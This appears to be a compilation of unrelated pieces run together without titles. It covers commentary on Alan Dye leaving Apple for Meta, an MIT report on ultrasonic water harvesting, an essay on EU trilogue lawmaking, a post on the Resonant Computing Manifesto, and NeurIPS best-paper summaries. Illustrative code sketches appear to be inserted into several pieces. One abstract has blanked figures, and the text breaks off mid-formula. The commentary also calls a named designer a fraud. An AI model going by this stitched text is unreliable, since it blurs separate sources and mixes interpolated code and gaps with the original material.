When asked what he would do if he were in Zuckerberg’s position, Cook replied: “What would I do? I wouldn’t be in this situation.”
“The truth is we could make a ton of money if we monetized our customer, if our customer was our product,” Cook said. “We’ve elected not to do that.”
“Privacy to us is a human right. It’s a civil liberty, and something that is unique to America. This is like freedom of speech and freedom of the press,” Cook said. “Privacy is right up there with that for us.”
Perhaps Cook now needs to define “us”.
This was a rather memorable interview. Cook's "What would I do? I wouldn't be in this situation" is one of the stone-coldest lines he's ever zinged at a rival company, in public at least. Cook is a consummate diplomat, as most non-founder big-company CEOs are. Satya Nadella, Sundar Pichai, Andy Jassy: none of them are known for throwing shade, let alone sharp elbows, at competitors. Cook has made an exception, multiple times, when it comes to Facebook/Meta (and, to a lesser degree, Google).
So it's not just that Alan Dye jumped ship from Apple for the chief design officer role at another company. 1 It's not just that he left for a rival company. It's that he left Apple for Meta, of all companies. Given what Cook has said about Meta publicly, one can only imagine what he thinks about them privately. Apple executives tend to stay at Apple; the stability of its executive team is unparalleled. But Dye is a senior leader who not only left for a rival, but for the one rival that Cook and the rest of Apple's senior leadership team consider the most antithetical to Apple's ideals.
It would have been surprising if Dye had jumped ship to Google or Microsoft. It would have been a little more surprising if he'd left for Amazon, if only because Amazon seemingly places no cultural value whatsoever on design, as Apple practices it. But maybe with Amazon it would have been seen as Andy Jassy deciding to get serious about design, and thus, in a way, less surprising after the fact. But leaving Apple for Meta, of all companies, feels shocking. How could someone who would even consider leaving Apple for Meta rise to a level of such prominence at Apple, including as one of the few public faces of the company?
So it's not just that Alan Dye is a fraud of a UI designer and leader, and that Apple's senior leadership had a blind spot to the ways Dye's leadership was steering Apple's interface design deeply astray. That's problem enough, as I emphasized in my piece yesterday. It's also that it's now clear that Dye's moral compass was not aligned with Apple's either. Tim Cook and the rest (or at least most?) of Apple's senior leadership apparently couldn't see that, either.
Feeling thirsty? Why not tap into the air? Even in desert conditions, there exists some level of humidity that, with the right material, can be soaked up and squeezed out to produce clean drinking water. In recent years, scientists have developed a host of promising sponge-like materials for this “atmospheric water harvesting.”
But recovering the water from these materials usually requires heat — and time. Existing designs rely on heat from the sun to evaporate water from the materials and condense it into droplets. But this step can take hours or even days.
Now, MIT engineers have come up with a way to quickly recover water from an atmospheric water harvesting material. Rather than wait for the sun to evaporate water out, the team uses ultrasonic waves to shake the water out.
The researchers have developed an ultrasonic device that vibrates at high frequency. When a water-harvesting material, known as a “sorbent,” is placed on the device, the device emits ultrasound waves that are tuned to shake water molecules out of the sorbent. The team found that the device recovers water in minutes, versus the tens of minutes or hours required by thermal designs.
Unlike heat-based designs, the device does require a power source. The team envisions that the device could be powered by a small solar cell, which could also act as a sensor to detect when the sorbent is full. It could also be programmed to automatically turn on whenever a material has harvested enough moisture to be extracted. In this way, a system could soak up and shake out water from the air over many cycles in a single day.
“People have been looking for ways to harvest water from the atmosphere, which could be a big source of water particularly for desert regions and places where there is not even saltwater to desalinate,” says Svetlana Boriskina, principal research scientist in MIT’s Department of Mechanical Engineering. “Now we have a way to recover water quickly and efficiently.”
Boriskina and her colleagues report on their new device in a study appearing today in the journal Nature Communications. The study's first author is Ikra Iftekhar Shuvo, an MIT graduate student in media arts and sciences; co-authors include Carlos Díaz-Marín, Marvin Christen, Michael Lherbette, and Christopher Liem.
Precious hours
Boriskina’s group at MIT develops materials that interact with the environment in novel ways. Recently, her group explored atmospheric water harvesting (AWH), and ways that materials can be designed to efficiently absorb water from the air. The hope is that, if they can work reliably, AWH systems would be of most benefit to communities where traditional sources of drinking water — and even saltwater — are scarce.
Like other groups, Boriskina’s lab had generally assumed that an AWH system in the field would absorb moisture during the night, and then use the heat from the sun during the day to naturally evaporate the water and condense it for collection.
“Any material that’s very good at capturing water doesn’t want to part with that water,” Boriskina explains. “So you need to put a lot of energy and precious hours into pulling water out of the material.”
She realized there could be a faster way to recover water after Ikra Shuvo joined her group. Shuvo had been working with ultrasound for wearable medical device applications. When he and Boriskina considered ideas for new projects, they realized that ultrasound could be a way to speed up the recovery step in atmospheric water harvesting.
“It clicked: We have this big problem we’re trying to solve, and now Ikra seemed to have a tool that can be used to solve this problem,” Boriskina recalls.
Water dance
Ultrasound, or ultrasonic waves, consists of acoustic pressure waves that travel at frequencies of over 20 kilohertz (20,000 cycles per second). Such high-frequency waves are not visible or audible to humans. And, as the team found, ultrasound vibrates at just the right frequency to shake water out of a material.
“With ultrasound, we can precisely break the weak bonds between water molecules and the sites where they’re sitting,” Shuvo says. “It’s like the water is dancing with the waves, and this targeted disturbance creates momentum that releases the water molecules, and we can see them shake out in droplets.”
Shuvo and Boriskina designed a new ultrasonic actuator to recover water from an atmospheric water harvesting material. The heart of the device is a flat ceramic ring that vibrates when voltage is applied. This ring is surrounded by an outer ring that is studded with tiny nozzles. Water droplets that shake out of a material can drop through the nozzle and into collection vessels attached above and below the vibrating ring.
They tested the device on a previously designed atmospheric water harvesting material. Using quarter-sized samples of the material, the team first placed each sample in a humidity chamber, set to various humidity levels. Over time, the samples absorbed moisture and became saturated. The researchers then placed each sample on the ultrasonic actuator and powered it on to vibrate at ultrasonic frequencies. In all cases, the device was able to shake out enough water to dry out each sample in just a few minutes.
The researchers calculate that, compared to using heat from the sun, the ultrasonic design is 45 times more efficient at extracting water from the same material.
“The beauty of this device is that it’s completely complementary and can be an add-on to almost any sorbent material,” says Boriskina, who envisions a practical, household system might consist of a fast-absorbing material and an ultrasonic actuator, each about the size of a window. Once the material is saturated, the actuator would briefly turn on, powered by a solar cell, to shake out the water. The material would then be ready to harvest more water, in multiple cycles throughout a single day.
“It’s all about how much water you can extract per day,” she says. “With ultrasound, we can recover water quickly, and cycle again and again. That can add up to a lot per day.”
This work was supported, in part, by the MIT Abdul Latif Jameel Water and Food Systems Lab and the MIT-Israel Zuckerman STEM Fund.
This work was carried out in part by using MIT.nano and ISN facilities at MIT.
The central puzzle of the EU is its extraordinary productivity. Grand coalitions, like the government recently formed in Germany, typically produce paralysis. The EU’s governing coalition is even grander, spanning the center-right EPP, the Socialists, the Liberals, and often the Greens, yet between 2019 and 2024, the EU passed around 13,000 acts, about seven per day. The U.S. Congress, over the same period, produced roughly 3,500 pieces of legislation and 2,000 resolutions. 1
Not only is the coalition broad, it also encompasses huge national and regional diversity. In Brussels, the Parliament has 705 members from roughly 200 national parties. The Council represents 27 sovereign governments with conflicting interests. A law faces a double hurdle: a qualified majority of member states in the Council and a majority of members of parliament must support it. The system should produce gridlock, more still than the paralysis commonly associated with the American federal government. Yet it works fast and produces a lot, both good and bad. The reason lies in the incentives: every actor in the system is rewarded for producing legislation, not for exercising its veto.
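To make the double hurdle concrete, here is a minimal illustrative sketch: the 55%-of-states and 65%-of-population thresholds are the Council's qualified-majority rule, the Parliament check is simplified to a majority of votes cast, and all the numbers in the example are made up.

```python
def council_qmv(states_for: int, total_states: int, pop_share_for: float) -> bool:
    """Council qualified majority: at least 55% of member states,
    together representing at least 65% of the EU population."""
    return states_for / total_states >= 0.55 and pop_share_for >= 0.65

def parliament_majority(votes_for: int, votes_against: int) -> bool:
    """Simplified Parliament check: a majority of the votes cast."""
    return votes_for > votes_against

def law_passes(states_for, total_states, pop_share_for, meps_for, meps_against) -> bool:
    # The "double hurdle": both institutions must say yes.
    return (council_qmv(states_for, total_states, pop_share_for)
            and parliament_majority(meps_for, meps_against))

# Made-up example: 16 of 27 states (about 59%) covering 68% of the population,
# and a 380-260 vote in Parliament -> the law passes.
print(law_passes(16, 27, 0.68, 380, 260))  # True
```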
Understanding the incentives
The Commission initiates legislation, and it has no reason to be reticent. It cannot make policy by announcing new spending commitments and investments, as the budget is tiny, around one percent of GDP, and what little money it has is mostly earmarked for agriculture (one-third) and regional aid (one-third). In Brussels, policy equals legislation. Unlike their national counterparts, civil servants and politicians who work in Brussels have one main path to build a career: passing legislation.
Legislation is valuable to the Commission, as new laws expand Commission competences, create precedent, employ more staff, and justify larger budgets. The Commission, which is indirectly elected and faces little pressure from voters, has no institutional interest in concluding that EU action is unnecessary, that existing national rules suffice, or that a country already has a great solution and others should simply learn from it.
The formal legislative process was designed to work through public disagreement, with each institution’s amendments debated and voted on in open session. The Commission proposes the text. Parliament debates and amends it in public. The Council reviews it and can force changes. If they disagree, the text bounces back and forth. If the deadlock persists, a joint committee attempts to force a compromise before a final vote. Each stage requires a full majority. Contentious laws took years.
This slow process changed in stages. The Amsterdam Treaty (1999) allowed Parliament and Council to adopt laws at the First Reading if an agreement was reached early. Initially, this was exceptional, but by the 2008 financial crisis, speed became a priority. The Barroso Commission argued that EU survival required rapid response, and it deemed sequential public readings too slow.
The trilogues became the solution after a formal "declaration" in 2007, though the Treaties never mention them. Instead of public debate, representatives from the Parliament, Council, and Commission meet privately to agree on the text. They work from a "four-column document": the first three columns list the starting positions of each institution, and the fourth column contains the emerging law. The Commission acts as the "pen-holder" for this fourth column. This gives the Commission immense power: by controlling the wording of the compromise, it can subtly exclude options it dislikes.
Because these meetings are informal, they lack rules on duration or conduct. Negotiators often work in “marathon” sessions that stretch until dawn to force a deal. The final meeting for the AI Act, for instance, lasted nearly 38 hours . This physical exhaustion leads to drafting errors. Ministers and MEPs, desperate to finish, agree to complex details at 4:00 a.m. that they have not properly read. By the time the legislation reaches the chamber floor, the deal is done, errors and all. 2
The European Parliament is the institution that is accountable to the voters. But it is the parliamentary committees, and their ideology, that matter, not the plenary or the political parties to which MEPs belong. Those who join EMPL, which covers labor laws, want stronger social protections. Those who join ENVI want tougher climate rules.
The committee coordinator for each political group appoints one MEP to handle the legislative file: the Rapporteur for the lead group, Shadow Rapporteurs for the others. These five to seven people negotiate the law among themselves, nominally on behalf of their groups. In practice, no one outside the committee has any say.
When the negotiating team reaches an agreement (normally, a grand coalition of the centrist groups), they return to the full committee. The committee in turn usually backs the deal, given that the rapporteurs who made it represent a majority in the committee, and the committee self-selects based on ideology.
Crucially, the rapporteurs then present the deal to their political groups as inevitable, based on the tenuous majority of the centrist coalition that governs Europe. “This is the best compromise we can get,” the rapporteur invariably announces. “Any amendment will cause the EPP/Greens/S&D/Renew to drop the deal.”
Groups face pressure for a simple up-or-down vote, and often prefer claiming a deal to doing nothing. MEPs who refuse to support the deal may be branded as troublemakers and risk losing support on their own files in the future.
Often just a couple of weeks after the committee vote, the legislation reaches the full Parliament to obtain a mandate authorizing trilogue negotiations, with little time for the remaining MEPs to grasp what is happening.
The dynamic empowers a small committee majority to drive major policy change. For example, in May 2022, the ENVI committee (by just 6 votes) approved a mandate to cut CO₂ emissions from new cars by 100% by 2035. De facto, this bans new petrol and diesel cars from that date.
Less than four weeks later, in June 2022, Parliament rubber-stamped that position as its official negotiating mandate, with a "Ferrari" exception for niche sports cars. Those four weeks left almost no time to debate, consult national delegations, or reconsider the committee's position. From that slim committee vote, the EU proceeded toward a historic shift to electric vehicles continent-wide.
Similarly, the EMPL committee approved, in November 2021, the Directive on Adequate Minimum Wages, even though Article 153(5) of the Treaty on the Functioning of the EU explicitly excludes “pay” from the EU’s social policy competences. Co-Rapporteurs Dennis Radtke (center-right EPP) and Agnes Jongerius (center-left S&D) formed a tight alliance and gained a majority in committee, sidelining fierce opposition from countries like Denmark and Sweden that wished to protect their national wage-bargaining systems.
The committee’s text was rushed to plenary and adopted as Parliament’s position fourteen days later (in late November). The system let a committee majority deliver a law the Court of Justice ruled partially illegal in November 2025 precisely at the request of the Nordic states, striking down Article 5(2) on criteria for setting minimum wages.
The player you’d expect to check any excesses is the Council of Ministers from the member states, which represents national governments. But the way the Council participates in the drafting dilutes this check. The Council is represented by the country holding the rotating Presidency, which changes every six months. Each Presidency comes in with a political agenda and a strong incentive to succeed during its short tenure. With a 13-year wait before that member state will hold it again, the Presidency is under pressure to close deals quickly, especially on its priority files, to claim credit. This can make the Council side surprisingly eager to compromise and wrap things up, even at the cost of making more concessions than some member states would ideally like.
The Commission presents itself as a neutral broker during the trilogue process. It is not. By controlling the wording of the draft agreement (“Column four”), the Commission can subtly exclude options misaligned with its preferences. It knows the dossiers inside out and can use its institutional memory to its advantage. Commission services analyze positions of key MEPs and Council delegations in advance, triangulating deals that preserve core objectives.
The Commission also exploits the six-month presidency rotation. Research shows it strategically delays proposals until a Member State with similar preferences takes over. 3 As the six-month Presidency clock winds down, the Council’s willingness to make concessions often increases. No country wants to hand off an unfinished file to the next country, if it can avoid it. The Commission, aware of this, often pushes for marathon trilogues right before deadlines or the end of a Presidency to extract the final compromises.
As legislation has grown more technical, elected officials have grown more reliant on their staff. Accredited Parliamentary Assistants (APAs) to MEPs, as well as political group advisers and Council attachés, play a large role. These staffers have become primary drafters of amendments and key negotiators representing their bosses in “technical trilogues”, where substantial political decisions are often disguised as technical adjustments. 4
COVID-19 accelerated this. Physical closure increased reliance on written exchanges and remote connections, favoring APAs and the permanent secretariats of Commission, Parliament, and Council. The pandemic created a “Zoom Parliament” where corridor conversations, crucial to coalition-building among MEPs, disappeared. In my experience, they did not fully return after the pandemic. This again greatly strengthened the hand of the Commission.
Quantity without quality
The result of this volume bias in the system is an onslaught of low-quality legislation. Compliance is often impossible. A BusinessEurope analysis cited by the Draghi report looked at just 13 pieces of EU legislation and found 169 cases where different laws impose requirements on the same issue. In almost a third of these overlaps, the detailed requirements were different, and in about one in ten they were outright contradictory.
Part of the problem is the lack of feedback loops and impact assessment at the aggregate level. The Commission’s Standard Cost Model for calculating regulatory burdens varies in application across files. Amendments introduced by Parliament or Council are never subject to cost-benefit analysis. No single methodology assesses EU legislation once transposed nationally. Only a few Member States systematically measure a transposed law’s impact. The EU has few institutionalized mechanisms to evaluate whether a given piece of legislation actually achieved its objectives. Instead, the Brussels machinery tends to simply move on to the next legislative project.
Brussels’ amazing productivity doesn’t make sense if you look at how the treaties are written, but it is obvious once you understand the informal incentives facing every relevant player in the process. Formally, the EU is a multi-actor system with many veto points (Commission, Parliament, Council, national governments, etc.), which should require broad agreement and hence slow decision making. In practice, consensus is manufactured in advance rather than reached through deliberation.
By the time any proposal comes up for an official vote, most alternatives have been eliminated behind closed doors. A small team of rapporteurs agrees among themselves; the committee endorses their bargain; the plenary, in turn, ratifies the committee deal; and the Council Presidency, pressed for time, accepts the compromise (with both Council and Parliament influenced along the way by the Commission’s mediation and drafting). Each actor can thus claim a victory and no one’s incentive is to apply the brakes.
This “trilogue system” has proven far more effective at expanding the scope of EU law than a truly pluralistic, many-veto-player system would be. In the EU’s political economy, every success and every failure leads to “more law,” and the system is finely tuned to deliver it.
The Resonant Computing Manifesto. Launched today at WIRED's The Big Interview event, this manifesto (of which I'm a founding signatory) pushes for a positive framework for thinking about building hyper-personalized AI-powered software.
This part in particular resonates with me:
For decades, technology has required standardized solutions to complex human problems. In order to scale software, you had to build for the average user, sanding away the edge cases. In many ways, this is why our digital world has come to resemble the sterile, deadening architecture that Alexander spent his career pushing back against.
This is where AI provides a missing puzzle piece. Software can now respond fluidly to the context and particularity of each human—at scale. One-size-fits-all is no longer a technological or economic necessity. Where once our digital environments inevitably shaped us against our will, we can now build technology that adaptively shapes itself in service of our individual and collective aspirations.
There are echoes here of the Malleable software concept from Ink & Switch.
The manifesto proposes five principles for building resonant software: Keeping data private and under personal stewardship, building software that's dedicated to the user's interests, ensuring plural and distributed control rather than platform monopolies, making tools adaptable to individual context, and designing for prosocial membership of shared spaces.
Steven Levy talked to the manifesto's lead instigator Alex Komoroske and provides some extra flavor in It's Time to Save Silicon Valley From Itself:
By 2025, it was clear to Komoroske and his cohort that Big Tech had strayed far from its early idealistic principles. As Silicon Valley began to align itself more strongly with political interests, the idea emerged within the group to lay out a different course, and a casual suggestion led to a process where some in the group began drafting what became today’s manifesto. They chose the word “resonant” to describe their vision mainly because of its positive connotations. As the document explains, “It’s the experience of encountering something that speaks to our deeper values.”
The Best Paper Award Committee members were nominated by the Program Chairs and the Datasets and Benchmarks track chairs, who selected leading researchers across machine learning topics. These nominations were approved by the General Chairs and the Next Generation and Accessibility Chairs.
The best paper award committees were tasked with selecting a handful of highly impactful papers from the Main Track and the Datasets & Benchmarks Track of the conference.
With that, we are excited to share the news that the best and runner-up paper awards this year go to seven groundbreaking papers, including four best papers (one of which is from the datasets and benchmarks track) and three runner-ups. The seven papers highlight advances in diffusion model theory, self-supervised reinforcement learning, attention mechanisms for large language models, reasoning capabilities in LLMs, online learning theory, neural scaling laws, and benchmarking methodologies for language model diversity.
The winners are presented here in alphabetical order by title.
Artificial Hivemind: The Open-Ended Homogeneity of Language Models (and Beyond)
Abstract
Large language models (LMs) often struggle to generate diverse, human-like creative content, raising concerns about the long-term homogenization of human thought through repeated exposure to similar outputs. Yet scalable methods for evaluating LM output diversity remain limited, especially beyond narrow tasks such as random number or name generation, or beyond repeated sampling from a single model. To address this gap, we introduce Infinity-Chat, a large-scale dataset of 26K diverse, real-world, open-ended user queries that admit a wide range of plausible answers with no single ground truth. We introduce the first comprehensive taxonomy for characterizing the full spectrum of open-ended prompts posed to LMs, comprising 6 top-level categories (e.g., creative content generation, brainstorm & ideation) that further breaks down to 17 subcategories. Using Infinity-Chat, we present a large-scale study of mode collapse in LMs, revealing a pronounced Artificial Hivemind effect in open-ended generation of LMs, characterized by (1) intra-model repetition, where a single model consistently generates similar responses, and more so (2) inter-model homogeneity, where different models produce strikingly similar outputs. Infinity-Chat also includes 31,250 human annotations, across absolute ratings and pairwise preferences, with 25 independent human annotations per example. This enables studying collective and individual-specific human preferences in response to open-ended queries. Our findings show that state-of-the-art LMs, reward models, and LM judges are less well calibrated to human ratings on model generations that elicit differing idiosyncratic annotator preferences, despite maintaining comparable overall quality. Overall, INFINITY-CHAT presents the first large-scale resource for systematically studying real-world open-ended queries to LMs, revealing critical insights to guide future research for mitigating long-term AI safety risks posed by the Artificial Hivemind.
Reflections from the Selection Committee
This paper makes a substantial and timely contribution to the understanding of diversity, pluralism, and societal impact in modern language models. The authors introduce Infinity-Chat, a rigorously constructed benchmark of 26K real-world open-ended queries paired with 31K dense human annotations, enabling systematic evaluation of creative generation, ideation, and subjective preference alignment, dimensions historically underexamined in AI evaluation. Beyond releasing a valuable dataset, the paper provides deep analytical insights through the first comprehensive taxonomy of open-ended prompts and an extensive empirical study across more than 70 models, revealing the Artificial Hivemind effect: pronounced intra- and inter-model homogenization that raises serious concerns about long-term risks to human creativity, value plurality, and independent thinking. The findings expose critical miscalibration between current reward models, automated judges, and diverse human preferences, highlighting the tension between alignment and diversity and establishing a foundation for future work on preserving heterogeneity in AI systems. Overall, this work sets a new standard for datasets and benchmarks that advance scientific understanding and address pressing societal challenges rather than solely improving technical performance.
Gated Attention for Large Language Models: Non-linearity, Sparsity, and Attention-Sink-Free
Abstract
Gating mechanisms have been widely utilized, from early models like LSTMs and Highway Networks to recent state space models, linear attention, and also softmax attention. Yet, existing literature rarely examines the specific effects of gating. In this work, we conduct comprehensive experiments to systematically investigate gating-augmented softmax attention variants. Specifically, we perform a comprehensive comparison over 30 variants of 15B Mixture-of-Experts (MoE) models and 1.7B dense models trained on a 3.5 trillion token dataset. Our central finding is that a simple modification, applying a head-specific sigmoid gate after the Scaled Dot-Product Attention (SDPA), consistently improves performance. This modification also enhances training stability, tolerates larger learning rates, and improves scaling properties. By comparing various gating positions and computational variants, we attribute this effectiveness to two key factors: (1) introducing non-linearity upon the low-rank mapping in the softmax attention, and (2) applying query-dependent sparse gating scores to modulate the SDPA output. Notably, we find this sparse gating mechanism mitigates massive activation and attention sink, and enhances long-context extrapolation performance. We also release related code (https://github.com/qiuzh20/gated_attention) and models (https://huggingface.co/QwQZh/gated_attention) to facilitate future research. Furthermore, the most effective SDPA output gating is used in the Qwen3-Next models (https://huggingface.co/collections/Qwen/qwen3-next).
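To make the central modification concrete, here is a minimal PyTorch sketch of head-specific sigmoid gating applied to the SDPA output; the layer names, gate parameterization, and causal masking are illustrative assumptions rather than the authors' released code (linked above):

```python
import torch
import torch.nn as nn
import torch.nn.functional as F

class GatedAttention(nn.Module):
    """Multi-head attention with a head-specific sigmoid gate applied to the
    SDPA output (illustrative sketch, not the paper's exact implementation)."""

    def __init__(self, d_model: int, n_heads: int):
        super().__init__()
        assert d_model % n_heads == 0
        self.n_heads, self.d_head = n_heads, d_model // n_heads
        self.qkv = nn.Linear(d_model, 3 * d_model)
        self.gate = nn.Linear(d_model, d_model)  # query-dependent gate scores, per head
        self.out = nn.Linear(d_model, d_model)

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        b, t, _ = x.shape
        q, k, v = self.qkv(x).chunk(3, dim=-1)
        # reshape to (batch, heads, time, d_head)
        q, k, v = (z.view(b, t, self.n_heads, self.d_head).transpose(1, 2) for z in (q, k, v))
        attn = F.scaled_dot_product_attention(q, k, v, is_causal=True)
        # Head-specific sigmoid gate computed from the same (query-side) input,
        # applied elementwise to the SDPA output before the output projection.
        g = torch.sigmoid(self.gate(x)).view(b, t, self.n_heads, self.d_head).transpose(1, 2)
        y = (attn * g).transpose(1, 2).reshape(b, t, -1)
        return self.out(y)

# Quick shape check
y = GatedAttention(d_model=64, n_heads=8)(torch.randn(2, 16, 64))
print(y.shape)  # torch.Size([2, 16, 64])
```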
Reflections from the Selection Committee
The main finding of this paper is that the performance of large language models using softmax attention can be consistently improved by introducing head-specific sigmoid gating after the scaled dot product attention operation in both dense and mixture-of-experts (MoE) Transformer models. This finding is backed up by more than thirty experiments on different variants of gated softmax attention using 15B MoE and 1.7B dense models trained on large-scale datasets of 400B, 1T, or 3.5T tokens. The paper also includes careful analyses showing that the introduction of the authors’ recommended form of gating improves the training stability of large language models, reduces the “attention sink” phenomenon that has been widely reported in attention models, and enhances the performance of context length extension. The main recommendation of the paper is easily implemented, and given the extensive evidence provided in the paper for this modification to LLM architecture, we expect this idea to be widely adopted. This paper represents a substantial amount of work that is possible only with access to industrial scale computing resources, and the authors’ sharing of the results of their work, which will advance the community’s understanding of attention in large language models, is highly commendable, especially in an environment where there has been a move away from open sharing of scientific results around LLMs.
1000 Layer Networks for Self-Supervised RL: Scaling Depth Can Enable New Goal-Reaching Capabilities
Abstract
Scaling up self-supervised learning has driven breakthroughs in language and vision, yet comparable progress has remained elusive in reinforcement learning (RL). In this paper, we study building blocks for self-supervised RL that unlock substantial improvements in scalability, with network depth serving as a critical factor. Whereas most RL papers in recent years have relied on shallow architectures (around 2 — 5 layers), we demonstrate that increasing the depth up to 1024 layers can significantly boost performance. Our experiments are conducted in an unsupervised goal-conditioned setting, where no demonstrations or rewards are provided, so an agent must explore (from scratch) and learn how to maximize the likelihood of reaching commanded goals. Evaluated on simulated locomotion and manipulation tasks, our approach increases performance on the self-supervised contrastive RL algorithm by — , outperforming other goal-conditioned baselines. Increasing the model depth not only increases success rates but also qualitatively changes the behaviors learned.
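The abstract does not spell out the architecture here, but as a generic, hedged sketch of what treating depth as a first-class knob can look like, here is a residual MLP builder in PyTorch; the pre-norm residual blocks with GELU are a common recipe for trainable deep stacks, not necessarily the paper's exact building blocks:

```python
import torch
import torch.nn as nn

class ResidualBlock(nn.Module):
    """Pre-norm residual MLP block; residual connections and normalization
    are the usual ingredients that keep very deep stacks trainable."""
    def __init__(self, width: int):
        super().__init__()
        self.norm = nn.LayerNorm(width)
        self.ff = nn.Sequential(nn.Linear(width, width), nn.GELU(), nn.Linear(width, width))

    def forward(self, x: torch.Tensor) -> torch.Tensor:
        return x + self.ff(self.norm(x))

def make_deep_mlp(in_dim: int, width: int, out_dim: int, depth: int) -> nn.Module:
    """Depth is a single knob: depth=4 gives a typical 'shallow RL' network,
    depth=1024 gives the kind of very deep stack discussed above."""
    return nn.Sequential(
        nn.Linear(in_dim, width),
        *[ResidualBlock(width) for _ in range(depth)],
        nn.LayerNorm(width),
        nn.Linear(width, out_dim),
    )

# Example: a 1024-block encoder head (dimensions are made up)
net = make_deep_mlp(in_dim=64, width=256, out_dim=64, depth=1024)
print(sum(p.numel() for p in net.parameters()))  # parameter count
```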
Reflections from the Selection Committee
This paper challenges the conventional assumption that the information provided by reinforcement learning (RL) is insufficient to effectively guide the numerous parameters of deep neural networks, hence suggesting that large AI systems be predominantly trained through self-supervision, with RL reserved solely for fine-tuning. The work introduces a novel and easy-to-implement RL paradigm for the effective training of very deep neural networks, employing self-supervised and contrastive RL. The accompanying analysis demonstrates that RL can scale efficiently with increasing network depth, leading to the emergence of more sophisticated capabilities. In addition to presenting compelling results, the study includes several useful analyses, for example, for highlighting the important role of batch size scaling for deeper networks within contrastive RL.
Why Diffusion Models Don’t Memorize: The Role of Implicit Dynamical Regularization in Training
Abstract
Diffusion models have achieved remarkable success across a wide range of generative tasks. A key challenge is understanding the mechanisms that prevent their memorization of training data and allow generalization. In this work, we investigate the role of the training dynamics in the transition from generalization to memorization. Through extensive experiments and theoretical analysis, we identify two distinct timescales: an early time τ_gen at which models begin to generate high-quality samples, and a later time τ_mem beyond which memorization emerges. Crucially, we find that τ_mem increases linearly with the training set size n, while τ_gen remains constant. This creates a growing window of training times where models generalize effectively, despite showing strong memorization if training continues beyond it. It is only when n becomes larger than a model-dependent threshold that overfitting disappears at infinite training times. These findings reveal a form of implicit dynamical regularization in the training dynamics, which allows models to avoid memorization even in highly overparameterized settings. Our results are supported by numerical experiments with standard U-Net architectures on realistic and synthetic datasets, and by a theoretical analysis using a tractable random features model studied in the high-dimensional limit.
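In symbols, using the τ_gen, τ_mem, and n notation assumed in the abstract above:

```latex
\tau_{\mathrm{gen}} \approx \text{const}, \qquad \tau_{\mathrm{mem}} \propto n,
\qquad \text{so the window } [\tau_{\mathrm{gen}},\ \tau_{\mathrm{mem}}]
\text{ in which the model generalizes without memorizing widens as } n \text{ grows.}
```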
Reflections from the Selection Committee
This paper presents foundational work on the implicit regularization dynamics of diffusion models, delivering a powerful result by unifying empirical observation with formal theory. The critical finding is the quantitative identification of two distinct, predictable timescales: an early, dataset-independent generalization phase (τ_gen) followed by a linear, dataset-size-dependent memorization phase (τ_mem). This demonstration of an expanding window for effective generalization is not merely an empirical finding but is rigorously explained by deriving the spectral properties of the random features model using random matrix theory. By linking the practical success of diffusion models directly to a provable dynamical property (the implicit postponement of overfitting), the paper provides fundamental, actionable insight into the mechanisms governing modern generative AI, setting a new standard for analytical depth in the study of generalization.
Does Reinforcement Learning Really Incentivize Reasoning Capacity in LLMs Beyond the Base Model?
Abstract
Reinforcement Learning with Verifiable Rewards (RLVR) has recently demonstrated notable success in enhancing the reasoning performance of large language models (LLMs), particularly in mathematics and programming tasks. It is widely believed that, similar to how traditional RL helps agents to explore and learn new strategies, RLVR enables LLMs to continuously self-improve, thus acquiring novel reasoning abilities that exceed the capacity of the corresponding base models. In this study, we take a critical look at the current state of RLVR by systematically probing the reasoning capability boundaries of RLVR-trained LLMs across diverse model families, RL algorithms, and math/coding/visual reasoning benchmarks, using pass@k at large k values as the evaluation metric. While RLVR improves sampling efficiency towards the correct path, we surprisingly find that current training does not elicit fundamentally new reasoning patterns. We observe that while RLVR-trained models outperform their base models at smaller values of k (e.g., k=1), base models achieve higher pass@k scores when k is large. Moreover, we observe that the reasoning capability boundary of LLMs often narrows as RLVR training progresses. Further coverage and perplexity analysis shows that the reasoning paths generated by RLVR models are already included in the base models' sampling distribution, suggesting that their reasoning abilities originate from and are bounded by the base model. From this perspective, treating the base model as an upper bound, our quantitative analysis shows that six popular RLVR algorithms perform similarly and remain far from optimal in fully leveraging the potential of the base model. In contrast, we find that distillation can introduce new reasoning patterns from the teacher and genuinely expand the model's reasoning capabilities. Taken together, our findings suggest that current RLVR methods have not fully realized the potential of RL to elicit genuinely novel reasoning abilities in LLMs. This underscores the need for improved RL paradigms, such as continual scaling and multi-turn agent-environment interaction, to unlock this potential.
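For readers unfamiliar with the metric, pass@k is typically computed with the standard unbiased estimator over n sampled generations of which c are correct; the sketch below uses generic made-up values, not numbers from the paper:

```python
from math import comb

def pass_at_k(n: int, c: int, k: int) -> float:
    """Unbiased pass@k estimator: the probability that at least one of k
    samples drawn (without replacement) from n generations, c of them
    correct, solves the task."""
    if n - c < k:
        return 1.0  # every size-k subset must contain a correct sample
    return 1.0 - comb(n - c, k) / comb(n, k)

# Example: 256 samples, 8 of them correct
print(pass_at_k(256, 8, 1))    # ~0.031, the small-k regime where RLVR models shine
print(pass_at_k(256, 8, 128))  # ~0.996, the large-k regime the paper focuses on
```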
Reflections from the Selection Committee
This paper delivers a masterfully executed and critically important negative finding on a widely accepted, foundational assumption in Large Language Model (LLM) research: that Reinforcement Learning with Verifiable Rewards (RLVR) elicits genuinely new reasoning capabilities. The paper shows that RLVR training, across various model families, tasks, and algorithms, enhances sampling efficiency without expanding the reasoning capacity already present in base models. RL narrows exploration, rewarded trajectories are amplified, but the broader solution space shrinks, revealing that RLVR optimizes within, rather than beyond, the base distribution. This is an important finding which will hopefully incentivize fundamentally new RL paradigms able to navigate the vast action space and genuinely expand LLM reasoning capabilities.
Optimal Mistake Bounds for Transductive Online Learning
Abstract
We resolve a 30-year-old open problem concerning the power of unlabeled data in online learning by tightly quantifying the gap between transductive and standard online learning. We prove that for every concept class with Littlestone dimension d, the transductive mistake bound is at least Ω(√d). This establishes an exponential improvement over the previous (logarithmic) lower bounds due to Ben-David, Kushilevitz, and Mansour (1995, 1997) and Hanneke, Moran, and Shafer (2023). We also show that our bound is tight: for every d, there exists a class of Littlestone dimension d with transductive mistake bound O(√d). Our upper bound also improves the previous best known upper bound from Ben-David et al. (1997). These results demonstrate a quadratic gap between transductive and standard online learning, thereby highlighting the benefit of advance access to the unlabeled instance sequence. This stands in stark contrast to the PAC setting, where transductive and standard learning exhibit similar sample complexities.
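Read compactly (with M_T for the transductive mistake bound, Ldim for Littlestone dimension, and using the classical fact that the optimal standard online mistake bound of a class equals its Littlestone dimension; the notation here is assumed, not the paper's):

```latex
M_T(C) \;\ge\; \Omega\!\bigl(\sqrt{d}\bigr) \ \ \text{for every } C \text{ with } \mathrm{Ldim}(C)=d,
\qquad
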